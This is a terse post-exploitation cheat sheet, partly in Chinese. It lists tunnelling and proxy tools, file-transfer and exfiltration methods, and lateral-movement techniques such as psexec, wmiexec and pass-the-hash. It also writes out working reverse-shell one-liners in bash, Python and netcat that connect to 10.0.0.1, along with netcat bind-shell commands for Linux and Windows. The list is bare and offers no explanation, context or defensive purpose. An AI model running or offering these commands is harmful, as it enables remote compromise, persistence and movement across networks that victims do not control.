lcx
netsh
portmap
iptables
Win: xsocks
Linux: proxychains
端口转发: tunna
socks代理: reGeorg
端口转发
socks
常规shell反弹
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
突破防火墙的imcp_shell反弹
正向shell
nc -e /bin/sh -lp 1234
nc.exe -e cmd.exe -lp 1234
powershell
vbs脚本文件
bitsadmin
文件共享
使用telnet接收数据
hta
python
wget
tar + ssh
利用dns传输数据
powershell将exe转为txt,再txt转为exe
at&schtasks
psexec
wmic
wmiexec.vbs
smbexec
powershell remoting
SC创建服务执行
schtasks
SMB+MOF || DLL Hijacks
PTH + compmgmt.msc